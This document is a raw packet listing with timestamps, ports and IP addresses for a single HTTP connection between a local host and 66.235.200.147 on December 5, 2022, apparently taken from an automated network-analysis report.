Dec 5, 2022 01:32:31.264591932 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.264635086 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.265412092 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.265456915 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.265496016 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.265508890 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.265542030 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.265567064 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.265584946 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.265628099 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.265638113 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.265670061 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.265712023 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.265721083 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.266802073 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.266846895 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.266864061 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.266911983 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.266958952 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.266963959 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.267002106 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.267045975 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.267050982 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.267086983 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.267127991 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.267133951 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.267205954 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.267237902 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.267258883 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.269469023 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.269511938 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.269548893 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.269557953 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.269602060 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.269608974 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.269644022 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.269686937 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.269692898 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.269730091 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.269771099 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.269777060 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.271066904 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.271111012 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.271137953 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.271152020 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.271194935 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.271202087 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.271239996 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.271281958 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.271286964 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.271333933 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.271375895 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.271380901 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.272392988 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.272435904 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.272463083 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.272478104 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.272526026 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.272531986 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.272568941 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.272610903 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.272619009 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.272654057 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.272696018 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.272703886 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.272831917 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.272881031 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.281596899 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.281644106 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.281683922 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.281717062 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.281725883 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.281769037 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.281773090 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.281810999 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.281867027 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.281888962 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.281934023 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.281985998 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.282706022 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.282748938 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.282789946 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.282805920 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.282831907 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.282893896 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.282893896 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.282947063 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.282988071 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.282998085 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.283030033 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.283082962 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.283919096 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.283961058 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.284002066 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.284017086 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.284044027 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.284084082 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.284100056 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.284126997 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.284168005 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.284174919 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.284210920 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.284284115 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.284379005 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.284451962 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.284482002 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.284527063 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.284539938 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.284569025 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.284589052 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.284612894 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.284655094 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.284677982 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.284696102 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.284739017 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.284754992 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.284782887 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.284833908 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.285393953 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.285438061 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.285480976 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.285511017 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.285526991 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.285569906 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.285588980 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.285614014 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.285655975 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.285671949 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.285728931 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.285784960 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.286314011 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.286359072 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.286401033 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.286412001 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.286443949 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.286487103 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.286494017 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.286533117 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.286573887 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.286587000 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.286617994 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.286673069 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.287234068 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.287358999 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.287404060 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.287414074 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.287446976 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.287499905 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.287504911 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.287576914 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.287631035 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.287641048 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.287689924 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.287731886 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.287770033 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.288270950 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.288317919 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.288338900 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.288358927 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.288400888 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.288414955 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.288449049 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.288491011 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.288512945 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.288537025 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.288578987 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.288593054 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.289197922 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.289242983 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.289280891 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.289285898 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.289329052 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.289343119 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.289371014 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.289418936 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.289422035 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.289500952 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.289546967 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.289592981 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.290154934 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.290199995 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.290234089 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.290244102 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.290293932 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.290302038 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.290363073 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.290405989 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.290416956 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.290447950 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.290488958 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.290498972 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.290534973 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.290589094 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.291171074 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.291215897 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.291258097 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.291270971 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.291300058 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.291342020 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.291351080 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.291383028 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.291425943 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.291438103 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.291469097 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.291522026 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.292073011 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.292117119 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.292160034 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.292171955 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.292202950 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.292246103 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.292256117 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.292289019 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.292330027 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.292344093 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.292373896 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.292431116 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.292990923 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.298927069 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.298959970 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.299005032 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.299854040 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.299887896 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.299923897 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.299948931 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.300020933 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.301843882 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.301882982 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.301943064 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.303771019 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.303806067 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.303881884 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.305732965 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.305779934 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.305844069 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.306232929 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.306318998 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.306360006 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.306376934 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.307027102 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.307070017 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.307096958 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.307111979 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.307163954 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.307818890 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.307863951 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.307907104 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.307925940 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.308516979 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.308563948 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.308579922 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.308605909 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.308646917 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.308657885 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.309439898 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.309483051 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.309511900 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.309525967 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.309568882 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.309578896 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.310281038 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.310326099 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.310343027 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.310369015 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.310411930 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.310420990 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.311080933 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.311124086 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.311137915 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.311167002 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.311208963 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.311218977 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.311877012 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.311922073 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.311932087 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.311964989 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.312005997 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.312016964 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.312686920 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.312728882 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.312741995 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.312769890 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.312813044 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.312823057 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.313467979 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.313510895 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.313532114 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.313555956 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.313597918 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.313613892 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.314261913 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.314306021 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.314322948 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.314347029 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.314392090 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.314400911 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.315045118 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.315088034 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.315109015 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.315131903 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.315172911 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.315184116 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.315833092 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.315893888 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.315918922 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.315937996 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.315983057 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.315993071 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.316617966 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.316663027 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.316687107 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.316704988 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.316746950 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.316761017 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.317403078 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.317445993 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.317471981 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.317523003 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.317570925 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.317583084 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.318150043 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.318192959 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.318228006 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.318233967 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.318275928 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.318296909 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.318319082 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.318377018 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.319080114 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.319123030 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.319164038 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.319184065 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.319235086 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.319278955 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.319288969 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.320023060 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.320066929 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.320106983 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.320111990 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.320149899 CET	80	49704	66.235.200.147	192.168.2.3
